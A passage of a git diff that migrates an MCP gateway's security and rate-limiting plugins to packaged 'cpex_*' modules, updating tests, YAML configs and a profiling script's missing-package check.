import Any, Dict, Iterable, List, Optional, Sequence, Set, Tuple try: + # Standard import tomllib except ModuleNotFoundError: # pragma: no cover - fallback for older runtimes + # Third-Party import tomli as tomllib # type: ignore @@ -107,8 +111,6 @@ def _classify_pyproject_scope(source: str, root: Path) -> str: return "plugins" if rel_parts[0] == "a2a-agents" and len(rel_parts) >= 2: return f"a2a-agents/{rel_parts[1]}" - if rel_parts[0] == "plugins_rust": - return "plugins_rust" if rel_parts[0] == "docs": return "docs" return f"other/{rel_parts[0]}" diff --git a/tests/integration/test_encoded_exfil.py b/tests/integration/test_encoded_exfil.py index ba12271d1e..3b6f1cd2f5 100644 --- a/tests/integration/test_encoded_exfil.py +++ b/tests/integration/test_encoded_exfil.py @@ -16,7 +16,7 @@ ToolHookType, ToolPostInvokePayload, ) -from plugins.encoded_exfil_detection.encoded_exfil_detector import ( +from cpex_encoded_exfil_detection.encoded_exfil_detection import ( EncodedExfilDetectorPlugin, ) @@ -26,7 +26,7 @@ def _make_plugin(config: dict, mode: str = "enforce") -> EncodedExfilDetectorPlu return EncodedExfilDetectorPlugin( PluginConfig( name="EncodedExfilDetector", - kind="plugins.encoded_exfil_detection.encoded_exfil_detector.EncodedExfilDetectorPlugin", + kind="cpex_encoded_exfil_detection.encoded_exfil_detection.EncodedExfilDetectorPlugin", hooks=[PromptHookType.PROMPT_PRE_FETCH, ToolHookType.TOOL_POST_INVOKE], mode=mode, config=config, diff --git a/tests/integration/test_rate_limiter.py b/tests/integration/test_rate_limiter.py index f07adc0d0f..505ee7f38a 100644 --- a/tests/integration/test_rate_limiter.py +++ b/tests/integration/test_rate_limiter.py @@ -43,7 +43,7 @@ from mcpgateway.plugins.framework.errors import PluginViolationError from mcpgateway.plugins.framework.manager import PluginExecutor from mcpgateway.plugins.framework.models import PluginMode -from plugins.rate_limiter.rate_limiter import RateLimiterPlugin +from cpex_rate_limiter.rate_limiter import RateLimiterPlugin # API Endpoints PROMPT_ENDPOINT = "/api/v1/prompts/" @@ -55,7 +55,7 @@ def rate_limit_plugin_2_per_second(): """Rate limiter plugin configured for 2 requests per second.""" config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["prompt_pre_fetch", "tool_pre_invoke"], priority=100, config={"by_user": "2/s", "by_tenant": None, "by_tool": {}}, @@ -68,7 +68,7 @@ def rate_limit_plugin_multi_dimensional(): """Rate limiter plugin with multi-dimensional limits.""" config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["prompt_pre_fetch", "tool_pre_invoke"], priority=100, config={"by_user": "10/s", "by_tenant": "5/s", "by_tool": {"restricted_tool": "1/s"}}, @@ -243,7 +243,7 @@ async def test_user_rate_limit_enforced(self): # Configure with ONLY user limits (no tenant limit) config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["prompt_pre_fetch"], priority=100, config={"by_user": "10/s", "by_tenant": None, "by_tool": {}}, # No tenant limit @@ -318,7 +318,7 @@ async def test_most_restrictive_dimension_selected(self): # Configure with different limits config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["prompt_pre_fetch"], priority=100, config={ @@ -424,7 +424,7 @@ class TestSlidingWindowIntegration: def plugin(self): config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["prompt_pre_fetch", "tool_pre_invoke"], priority=100, config={"by_user": "3/s", "algorithm": "sliding_window"}, @@ -513,7 +513,7 @@ class TestTokenBucketIntegration: def plugin(self): config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["prompt_pre_fetch", "tool_pre_invoke"], priority=100, config={"by_user": "3/s", "algorithm": "token_bucket"}, @@ -606,7 +606,7 @@ class TestCrossHookSharing: def plugin(self): config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["prompt_pre_fetch", "tool_pre_invoke"], priority=100, config={"by_user": "5/s"}, @@ -654,7 +654,7 @@ async def test_tenant_counter_shared_across_hooks_and_users(self, plugin): """Tenant bucket is shared across all users in the same tenant, regardless of hook.""" config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["prompt_pre_fetch", "tool_pre_invoke"], priority=100, config={"by_user": "10/s", "by_tenant": "4/s"}, @@ -687,7 +687,7 @@ class TestPermissiveMode: def _make_plugin_and_hook(self, limit: str) -> tuple: config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], priority=100, mode=PluginMode.PERMISSIVE, @@ -737,7 +737,7 @@ async def test_permissive_mode_contrast_with_enforce(self): """Enforce mode raises PluginViolationError; permissive mode does not.""" enforce_config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], config={"by_user": "1/s"}, mode=PluginMode.ENFORCE, @@ -764,7 +764,7 @@ class TestDisabledMode: def _make_plugin_and_refs(self) -> tuple: config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], priority=100, mode=PluginMode.DISABLED, @@ -819,7 +819,7 @@ class TestTenantIsolation: def plugin(self): config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], priority=100, config={"by_user": "3/s", "by_tenant": "5/s"}, @@ -907,7 +907,7 @@ async def test_none_tenant_id_skips_by_tenant_entirely(self): """ config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], priority=100, config={"by_user": "100/s", "by_tenant": "5/s"}, @@ -953,7 +953,7 @@ async def test_explicit_tenant_scopes_correctly_after_fix(self): """ config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], priority=100, config={"by_user": "100/s", "by_tenant": "5/s"}, @@ -982,7 +982,7 @@ async def test_no_limits_configured_allows_all_requests(self): """Plugin with all dimensions None must allow every request without tracking.""" config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], config={}, # no by_user, no by_tenant, no by_tool ) @@ -999,7 +999,7 @@ async def test_no_limits_configured_returns_no_headers(self): """Plugin with no configured limits must not set X-RateLimit-* headers.""" config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], config={}, ) @@ -1015,7 +1015,7 @@ async def test_none_user_defaults_to_anonymous_bucket(self): """user=None in GlobalContext must fall back to 'anonymous' as the rate limit key.""" config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], config={"by_user": "2/s"}, ) @@ -1038,7 +1038,7 @@ async def test_none_tenant_id_skips_by_tenant_check(self): """tenant_id=None in GlobalContext must skip the by_tenant check entirely — no 'default' bucket.""" config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], config={"by_tenant": "2/s"}, ) @@ -1059,7 +1059,7 @@ async def test_both_user_and_tenant_none_still_enforces(self): """With both user=None and tenant_id=None the plugin must still enforce limits.""" config = PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], config={"by_user": "2/s", "by_tenant": "10/s"}, ) @@ -1081,7 +1081,7 @@ def make_plugin(): return RateLimiterPlugin( PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], config={"by_user": "2/s"}, ) @@ -1175,7 +1175,7 @@ def _make_redis_plugin(redis_url: str, algorithm: str = "fixed_window", limit: s return RateLimiterPlugin( PluginConfig( name="RateLimiter", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=["tool_pre_invoke"], priority=100, config={ diff --git a/tests/performance/PLUGIN_PROFILING.md b/tests/performance/PLUGIN_PROFILING.md index 841240ec08..a761ee9324 100644 --- a/tests/performance/PLUGIN_PROFILING.md +++ b/tests/performance/PLUGIN_PROFILING.md @@ -2,6 +2,16 @@ This guide explains how to use the plugin performance profiling tool in `test_plugins_performance.py`. +## Prerequisites + +The profiling config (`tests/performance/plugins/config.yaml`) references several plugins from the `[plugins]` extra (`cpex-pii-filter`, `cpex-rate-limiter`, `cpex-retry-with-backoff`, `cpex-secrets-detection`, `cpex-url-reputation`). Install them before running the profiler: + +```bash +pip install -e '.[plugins]' +``` + +If any of these packages are missing, the script will print a clear "skipping plugin perf profiling" message naming the missing packages and exit cleanly without producing any profile files. + ## Quick Start ### Run with Summary Table Only (Default) diff --git a/tests/performance/plugins/config.yaml b/tests/performance/plugins/config.yaml index 49b0282835..bacb402dd0 100644 --- a/tests/performance/plugins/config.yaml +++ b/tests/performance/plugins/config.yaml @@ -53,7 +53,7 @@ plugins: # PII Filter Plugin - Run first with highest priority for security - name: PIIFilterPlugin - kind: plugins.pii_filter.pii_filter.PIIFilterPlugin + kind: cpex_pii_filter.PIIFilterPlugin description: Detects and masks Personally Identifiable Information version: 0.1.0 author: Mihai Criveti @@ -236,12 +236,12 @@ plugins: conditions: [] config: {} - # Rate limiter (fixed_window algorithm, memory backend — default) + # Rate limiter (cpex-rate-limiter package) - name: RateLimiterPlugin - kind: plugins.rate_limiter.rate_limiter.RateLimiterPlugin - description: Per-user/tenant/tool rate limits — fixed window algorithm - version: 0.1.0 - author: Pratik Gandhi + kind: cpex_rate_limiter.RateLimiterPlugin + description: Per-user/tenant/tool rate limits + version: 0.0.2 + author: Mihai Criveti hooks: [prompt_pre_fetch, tool_pre_invoke] tags: [limits, throttle] mode: permissive @@ -256,10 +256,10 @@ plugins: # Rate limiter (sliding_window algorithm, memory backend) - name: RateLimiterPlugin_sliding_window - kind: plugins.rate_limiter.rate_limiter.RateLimiterPlugin + kind: cpex_rate_limiter.RateLimiterPlugin description: Per-user/tenant/tool rate limits — sliding window algorithm - version: 0.1.0 - author: Pratik Gandhi + version: 0.0.2 + author: Mihai Criveti hooks: [prompt_pre_fetch, tool_pre_invoke] tags: [limits, throttle] mode: permissive @@ -274,10 +274,10 @@ plugins: # Rate limiter (token_bucket algorithm, memory backend) - name: RateLimiterPlugin_token_bucket - kind: plugins.rate_limiter.rate_limiter.RateLimiterPlugin + kind: cpex_rate_limiter.RateLimiterPlugin description: Per-user/tenant/tool rate limits — token bucket algorithm - version: 0.1.0 - author: Pratik Gandhi + version: 0.0.2 + author: Mihai Criveti hooks: [prompt_pre_fetch, tool_pre_invoke] tags: [limits, throttle] mode: permissive @@ -292,10 +292,10 @@ plugins: # Rate limiter (fixed_window algorithm, Redis backend) - name: RateLimiterPlugin_redis_fixed_window - kind: plugins.rate_limiter.rate_limiter.RateLimiterPlugin + kind: cpex_rate_limiter.RateLimiterPlugin description: Per-user/tenant/tool rate limits — fixed window algorithm, Redis backend - version: 0.1.0 - author: Pratik Gandhi + version: 0.0.2 + author: Mihai Criveti hooks: [prompt_pre_fetch, tool_pre_invoke] tags: [limits, throttle] mode: permissive @@ -313,10 +313,10 @@ plugins: # Rate limiter (sliding_window algorithm, Redis backend) - name: RateLimiterPlugin_redis_sliding_window - kind: plugins.rate_limiter.rate_limiter.RateLimiterPlugin + kind: cpex_rate_limiter.RateLimiterPlugin description: Per-user/tenant/tool rate limits — sliding window algorithm, Redis backend - version: 0.1.0 - author: Pratik Gandhi + version: 0.0.2 + author: ContextForge hooks: [prompt_pre_fetch, tool_pre_invoke] tags: [limits, throttle] mode: permissive @@ -334,10 +334,10 @@ plugins: # Rate limiter (token_bucket algorithm, Redis backend) - name: RateLimiterPlugin_redis_token_bucket - kind: plugins.rate_limiter.rate_limiter.RateLimiterPlugin + kind: cpex_rate_limiter.RateLimiterPlugin description: Per-user/tenant/tool rate limits — token bucket algorithm, Redis backend - version: 0.1.0 - author: Pratik Gandhi + version: 0.0.2 + author: ContextForge hooks: [prompt_pre_fetch, tool_pre_invoke] tags: [limits, throttle] mode: permissive @@ -419,10 +419,10 @@ plugins: # URL reputation static checks - name: URLReputationPlugin - kind: plugins.url_reputation.url_reputation.URLReputationPlugin + kind: cpex_url_reputation.URLReputationPlugin description: Blocks known-bad domains or patterns before fetch version: 0.1.0 - author: Mihai Criveti + author: ContextForge hooks: [resource_pre_fetch] tags: [security, url, reputation] mode: permissive @@ -453,10 +453,10 @@ plugins: # Retry with exponential backoff — triggers real gateway re-invocation - name: RetryWithBackoffPlugin - kind: plugins.retry_with_backoff.retry_with_backoff.RetryWithBackoffPlugin + kind: cpex_retry_with_backoff.RetryWithBackoffPlugin description: Detects transient failures and asks the gateway to re-invoke the tool after a jittered exponential backoff delay version: 0.1.0 - author: Mihai Criveti + author: ContextForge hooks: [tool_post_invoke] tags: [retry, backoff, resilience] mode: permissive @@ -795,7 +795,7 @@ plugins: # Secrets Detection - regex-based detector for common secrets/keys - name: SecretsDetection - kind: plugins.secrets_detection.secrets_detection.SecretsDetectionPlugin + kind: cpex_secrets_detection.SecretsDetectionPlugin description: Detects keys/tokens/secrets in inputs/outputs; optional redaction/blocking version: 0.1.0 author: ContextForge diff --git a/tests/performance/test_plugins_performance.py b/tests/performance/test_plugins_performance.py index 0b94191123..3991f62165 100644 --- a/tests/performance/test_plugins_performance.py +++ b/tests/performance/test_plugins_performance.py @@ -27,6 +27,7 @@ import asyncio from collections import defaultdict import cProfile +import importlib.util import io import logging import os @@ -65,6 +66,17 @@ PROFILE_OUTPUT_DIR = os.path.join(SCRIPT_DIR, "plugins", "prof") ITERATIONS = 1000 # Number of iterations per hook +# Optional cpex-* plugin packages referenced by tests/performance/plugins/config.yaml. +# These ship in the [plugins] extra; if any are missing, the perf script skips +# cleanly rather than failing inside PluginManager initialization. +REQUIRED_CPEX_PACKAGES = ( + "cpex_pii_filter", + "cpex_rate_limiter", + "cpex_retry_with_backoff", + "cpex_secrets_detection", + "cpex_url_reputation", +) + def ensure_profile_dir() -> None: """Ensure the profile output directory exists.""" @@ -369,6 +381,15 @@ async def main(): if args.details: print("Mode: Detailed profiles enabled") + # Skip cleanly if optional cpex-* plugin packages are not installed. + # The perf config references plugins from the [plugins] extra; without them + # PluginManager.initialize() would raise inside the loader. + missing = [pkg for pkg in REQUIRED_CPEX_PACKAGES if importlib.util.find_spec(pkg) is None] + if missing: + print(f"\n⏭️ Skipping plugin perf profiling — missing optional packages: {', '.join(missing)}") + print(" Install with: pip install -e '.[plugins]'") + return + # Ensure output directory exists ensure_profile_dir() diff --git a/tests/unit/mcpgateway/plugins/fixtures/configs/init_hooks_plugins_test.yaml b/tests/unit/mcpgateway/plugins/fixtures/configs/init_hooks_plugins_test.yaml index f25a2fb0df..6cf40c2586 100644 --- a/tests/unit/mcpgateway/plugins/fixtures/configs/init_hooks_plugins_test.yaml +++ b/tests/unit/mcpgateway/plugins/fixtures/configs/init_hooks_plugins_test.yaml @@ -57,7 +57,7 @@ plugins: # PII Filter Plugin - Run first with highest priority for security - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" description: "Detects and masks Personally Identifiable Information" version: "0.1.0" author: "Mihai Criveti" @@ -205,15 +205,15 @@ plugins: conditions: [] config: {} - # Rate limiter (fixed window, in-memory) + # Rate limiter (cpex-rate-limiter package) - name: "RateLimiterPlugin" - kind: "plugins.rate_limiter.rate_limiter.RateLimiterPlugin" + kind: "cpex_rate_limiter.RateLimiterPlugin" description: "Per-user/tenant/tool rate limits" - version: "0.1.0" + version: "0.0.2" author: "Mihai Criveti" hooks: ["prompt_pre_fetch", "tool_pre_invoke"] tags: ["limits", "throttle"] - mode: "permissive" + mode: "disabled" priority: 20 conditions: [] config: @@ -287,7 +287,7 @@ plugins: # URL reputation static checks - name: "URLReputationPlugin" - kind: "plugins.url_reputation.url_reputation.URLReputationPlugin" + kind: "cpex_url_reputation.URLReputationPlugin" description: "Blocks known-bad domains or patterns before fetch" version: "0.1.0" author: "Mihai Criveti" @@ -318,7 +318,7 @@ plugins: # Retry policy annotations - name: "RetryWithBackoffPlugin" - kind: "plugins.retry_with_backoff.retry_with_backoff.RetryWithBackoffPlugin" + kind: "cpex_retry_with_backoff.RetryWithBackoffPlugin" description: "Annotates retry/backoff policy in metadata" version: "0.1.0" author: "Mihai Criveti" @@ -638,7 +638,7 @@ plugins: # Secrets Detection - regex-based detector for common secrets/keys - name: "SecretsDetection" - kind: "plugins.secrets_detection.secrets_detection.SecretsDetectionPlugin" + kind: "cpex_secrets_detection.SecretsDetectionPlugin" description: "Detects keys/tokens/secrets in inputs/outputs; optional redaction/blocking" version: "0.1.0" author: "ContextForge" diff --git a/tests/unit/mcpgateway/plugins/framework/test_manager.py b/tests/unit/mcpgateway/plugins/framework/test_manager.py index 089812cf6e..394ddfa058 100644 --- a/tests/unit/mcpgateway/plugins/framework/test_manager.py +++ b/tests/unit/mcpgateway/plugins/framework/test_manager.py @@ -7,13 +7,17 @@ Unit tests for plugin manager. """ +# Standard +from pathlib import Path + # Third-Party import pytest +import yaml # First-Party from mcpgateway.common.models import Message, PromptResult, Role, TextContent from mcpgateway.plugins.framework import GlobalContext, PluginManager, PluginViolationError -from mcpgateway.plugins.framework import PromptHookType, ToolHookType, HttpHeaderPayload, PromptPosthookPayload, PromptPrehookPayload, ToolPostInvokePayload, ToolPreInvokePayload +from mcpgateway.plugins.framework import PromptHookType, ResourceHookType, ToolHookType, HttpHeaderPayload, PromptPosthookPayload, PromptPrehookPayload, ToolPostInvokePayload, ToolPreInvokePayload from plugins.regex_filter.search_replace import SearchReplaceConfig @@ -380,6 +384,7 @@ async def test_plugin_manager_thread_safety(): # Track config loads by wrapping ConfigLoader from mcpgateway.plugins.framework.loader.config import ConfigLoader + original_load = ConfigLoader.load_config load_count = {"value": 0} @@ -509,3 +514,73 @@ async def shutdown_task(): # Clean up PluginManager.reset() + + +@pytest.mark.asyncio +@pytest.mark.parametrize( + ("source_config", "expected_names"), + [ + ( + "plugins/config.yaml", + { + "PIIFilterPlugin", + "RateLimiterPlugin", + "URLReputationPlugin", + "RetryWithBackoffPlugin", + "SecretsDetection", + "EncodedExfilDetector", + }, + ), + ( + "plugins/config-pii-guardian-policy.yaml", + { + "PIIFilterPlugin", + "RateLimiterPlugin", + "URLReputationPlugin", + "RetryWithBackoffPlugin", + "SecretsDetection", + "EncodedExfilDetector", + }, + ), + ], +) +async def test_manager_initializes_packaged_plugins_from_shipped_configs(tmp_path: Path, source_config: str, expected_names: set[str]): + """Shipped packaged-plugin entries should import through the real PluginManager.""" + PluginManager.reset() + source_path = Path(source_config) + config = yaml.safe_load(source_path.read_text(encoding="utf-8")) + selected_plugins = [] + for plugin in config["plugins"]: + if plugin["name"] not in expected_names: + continue + selected_plugin = dict(plugin) + if selected_plugin.get("mode") == "disabled": + selected_plugin["mode"] = "permissive" + selected_plugins.append(selected_plugin) + assert {plugin["name"] for plugin in selected_plugins} == expected_names + + smoke_config = { + "plugin_dirs": config.get("plugin_dirs", []), + "plugin_settings": {**config.get("plugin_settings", {}), "fail_on_plugin_error": True}, + "plugins": selected_plugins, + } + config_path = tmp_path / f"{source_path.stem}-packaged-smoke.yaml" + config_path.write_text(yaml.safe_dump(smoke_config, sort_keys=False), encoding="utf-8") + + manager = PluginManager(str(config_path)) + try: + await manager.initialize() + assert manager.initialized + assert manager.plugin_count == len(expected_names) + assert {plugin.name for plugin in manager.config.plugins} == expected_names + prompt_pre_refs = manager._registry.get_hook_refs_for_hook(PromptHookType.PROMPT_PRE_FETCH) # pylint: disable=protected-access + tool_post_refs = manager._registry.get_hook_refs_for_hook(ToolHookType.TOOL_POST_INVOKE) # pylint: disable=protected-access + resource_pre_refs = manager._registry.get_hook_refs_for_hook(ResourceHookType.RESOURCE_PRE_FETCH) # pylint: disable=protected-access + + assert "PIIFilterPlugin" in {ref.plugin_ref.name for ref in prompt_pre_refs} + assert "RetryWithBackoffPlugin" in {ref.plugin_ref.name for ref in tool_post_refs} + assert "EncodedExfilDetector" in {ref.plugin_ref.name for ref in tool_post_refs} + assert "URLReputationPlugin" in {ref.plugin_ref.name for ref in resource_pre_refs} + finally: + await manager.shutdown() + PluginManager.reset() diff --git a/tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py b/tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py index e84e8097b7..e995bcf92f 100644 --- a/tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py +++ b/tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py @@ -1,917 +1,85 @@ # -*- coding: utf-8 -*- -"""Location: ./tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -Unit tests for PII Filter Plugin with parametric testing for both Python and Rust implementations. -""" +"""Tests for the packaged PII filter plugin.""" # Standard import logging -import os -import time -from typing import Type # Third-Party import pytest # First-Party from mcpgateway.common.models import Message, PromptResult, Role, TextContent -from mcpgateway.plugins.framework import ( - GlobalContext, - PluginConfig, - PluginContext, - PluginMode, - PromptHookType, - PromptPosthookPayload, - PromptPrehookPayload, -) - -# Import the PII Filter plugin -from plugins.pii_filter.pii_filter import ( - MaskingStrategy, - PIIDetector, - PIIFilterConfig, - PIIFilterPlugin, - PIIType, -) -from plugins.pii_filter import pii_filter as pii_filter_module - -# Try to import Rust implementation -try: - from plugins.pii_filter.pii_filter import RustPIIDetector, RUST_AVAILABLE -except ImportError: - RUST_AVAILABLE = False - RustPIIDetector = None - # Fail in CI if Rust plugins are required - if os.environ.get("REQUIRE_RUST") == "1": - raise ImportError("Rust plugin 'pii_filter' is required in CI but not available") - - -# Parametric fixture for detector implementations -@pytest.fixture(params=["python", "rust"]) -def detector_class(request) -> Type: - """Fixture that provides both Python and Rust detector classes.""" - if request.param == "python": - return PIIDetector - elif request.param == "rust": - if not RUST_AVAILABLE: - pytest.skip("Rust implementation not available") - return RustPIIDetector - raise ValueError(f"Unknown detector type: {request.param}") +from mcpgateway.plugins.framework import GlobalContext, PluginConfig, PluginContext, PluginMode, PromptHookType, PromptPosthookPayload, PromptPrehookPayload +from cpex_pii_filter import PIIDetectorRust +from cpex_pii_filter.pii_filter import PIIFilterPlugin @pytest.fixture -def detector_impl(request) -> str: - """Fixture that provides the implementation name for conditional assertions.""" - return getattr(request, "param", "python") - - -def normalize_detection_keys(detections: dict) -> set: - """ - Normalize detection keys from both Python and Rust implementations. - Python returns PIIType enum (e.g., PIIType.SSN), Rust returns lowercase strings (e.g., "ssn"). - This extracts just the type name in lowercase. - """ - detection_keys = set() - for k in detections.keys(): - key_str = str(k).lower() - # Handle both "PIIType.SSN" / "piitype.ssn" and plain "ssn" formats - if "." in key_str: - key_str = key_str.split(".")[-1] - detection_keys.add(key_str) - return detection_keys - - -def is_rust_detector_class(detector_class: Type) -> bool: - """Return True when the provided detector class is the Rust-backed implementation.""" - return detector_class is not PIIDetector - - -class TestPIIDetectorParametric: - """Parametric tests that run on both Python and Rust implementations.""" - - @pytest.fixture - def default_config(self): - """Create default configuration for testing.""" - return PIIFilterConfig() - - @pytest.fixture - def detector(self, detector_class, default_config): - """Create detector instance with default config.""" - return detector_class(default_config) - - def test_initialization(self, detector_class, default_config): - """Test detector initialization.""" - detector = detector_class(default_config) - assert detector is not None - # Note: Rust implementation doesn't expose config attribute (internal optimization) - # Python implementation does expose it for compatibility - if hasattr(detector, "config"): - assert detector.config == default_config - - # SSN Detection Tests - @pytest.mark.parametrize( - "text,should_detect,acceptable_types", - [ - ("My SSN is 123-45-6789", True, ["ssn"]), - ("Number 123-45-6789 is sensitive", True, ["ssn"]), - ("SSN: 123456789", True, ["ssn", "bank_account", "phone"]), # No dashes - may match multiple patterns - ("No SSN here", False, []), - ], - ) - def test_ssn_detection(self, detector_class, text, should_detect, acceptable_types): - """Test Social Security Number detection.""" - config = PIIFilterConfig(detect_ssn=True, detect_bsn=False) - detector = detector_class(config) - detections = detector.detect(text) - detection_keys = normalize_detection_keys(detections) - - if should_detect: - # Check if any of the acceptable types were detected - assert any(pii_type in detection_keys for pii_type in acceptable_types), f"Expected one of {acceptable_types} but got {detection_keys}" - else: - assert "ssn" not in detection_keys - - def test_ssn_detection_with_position(self, detector_class): - """Test SSN detection with position information (Rust-specific feature).""" - config = PIIFilterConfig(detect_ssn=True) - detector = detector_class(config) - text = "My SSN is 123-45-6789" - detections = detector.detect(text) - - # Normalize keys - handle both "ssn" and "PIIType.SSN" / "piitype.ssn" - detection_keys = normalize_detection_keys(detections) - assert "ssn" in detection_keys - - # Get the actual key for further checks - ssn_key = next((k for k in detections.keys() if "ssn" in str(k).lower()), None) - assert ssn_key is not None - assert len(detections[ssn_key]) == 1 - - # Check value - detection = detections[ssn_key][0] - assert detection["value"] == "123-45-6789" - - # Position info available in Rust implementation - if detector_class.__name__ == "RustPIIDetector": - assert detection["start"] == 10 - assert detection["end"] == 21 - - def test_ssn_masking_partial(self, detector): - """Test partial masking of SSN.""" - detector = type(detector)(PIIFilterConfig(detect_ssn=True, default_mask_strategy=MaskingStrategy.PARTIAL)) - text = "SSN: 123-45-6789" - detections = detector.detect(text) - masked = detector.mask(text, detections) - - # Check that the last 4 digits are preserved and original is masked - assert "6789" in masked - assert "123-45-6789" not in masked - - # BSN Detection Tests (Python-specific) - @pytest.mark.parametrize( - "text,should_detect", - [ - ("My BSN is 180774955. Store it and confirm.", True), - ("BSN: 123456789", True), - ("Regular number 180774955", True), - ("No BSN here", False), - ("Too short 12345678", False), - ("Too long 1234567890", False), - ], - ) - def test_bsn_detection(self, detector_class, text, should_detect): - """Test Dutch BSN (Burgerservicenummer) detection.""" - config = PIIFilterConfig(detect_bsn=True, detect_ssn=False, detect_phone=False, detect_bank_account=False) - detector = detector_class(config) - detections = detector.detect(text) - detection_keys = normalize_detection_keys(detections) - - expected_detection = should_detect - if is_rust_detector_class(detector_class) and text == "Regular number 180774955": - expected_detection = False - - if expected_detection: - assert "bsn" in detection_keys, f"Expected BSN detection in: {text}" - else: - assert "bsn" not in detection_keys, f"Unexpected BSN detection in: {text}" - - def test_bsn_masking(self, detector_class): - """Test BSN partial masking.""" - config = PIIFilterConfig(detect_bsn=True, detect_ssn=False, detect_phone=False, detect_bank_account=False, default_mask_strategy=MaskingStrategy.PARTIAL) - detector = detector_class(config) - - text = "My BSN is 180774955. Store it and confirm." - detections = detector.detect(text) - masked = detector.mask(text, detections) - - assert "180774955" not in masked - assert "*****4955" in masked - - @pytest.mark.parametrize( - "text,should_detect,description", - [ - # Valid BSN numbers (pass 11-proef check) - ("BSN: 111222333", True, "Valid BSN with 11-proef"), - ("My BSN is 123456782", True, "Valid BSN embedded in text"), - ("Citizen ID 180774955 on file", True, "Valid BSN in context"), - # Invalid BSN numbers (fail 11-proef check) - should still detect as pattern match - # Note: Current implementation uses simple regex, not validation - ("BSN: 123456789", True, "9-digit number (invalid BSN but matches pattern)"), - ("ID: 987654321", True, "9-digit number (invalid BSN but matches pattern)"), - # Edge cases that should NOT be detected as BSN - ("Phone: 555123456", False, "9-digit phone number with context"), - ("Account: 12345678", False, "8-digit number (too short)"), - ("Number: 1234567890", False, "10-digit number (too long)"), - ("Partial 12345 6789 split", False, "Split 9-digit number"), - # Context-specific false positives to prevent - ("Order #123456789", True, "Order number (9 digits - will match pattern)"), - ("Invoice 987654321", True, "Invoice number (9 digits - will match pattern)"), - ("Tracking: 555666777", True, "Tracking number (9 digits - will match pattern)"), - # Multiple 9-digit numbers - ("BSN 111222333 and 123456782", True, "Multiple valid BSNs"), - ("Numbers: 123456789 and 987654321", True, "Multiple 9-digit numbers"), - ], - ) - def test_bsn_pattern_validation(self, detector_class, text, should_detect, description): - """Test BSN pattern detection with various edge cases to prevent false positives. - - Note: Current implementation uses simple regex pattern matching (r'\\b\\d{9}\\b') - without 11-proef validation. This test documents expected behavior and - 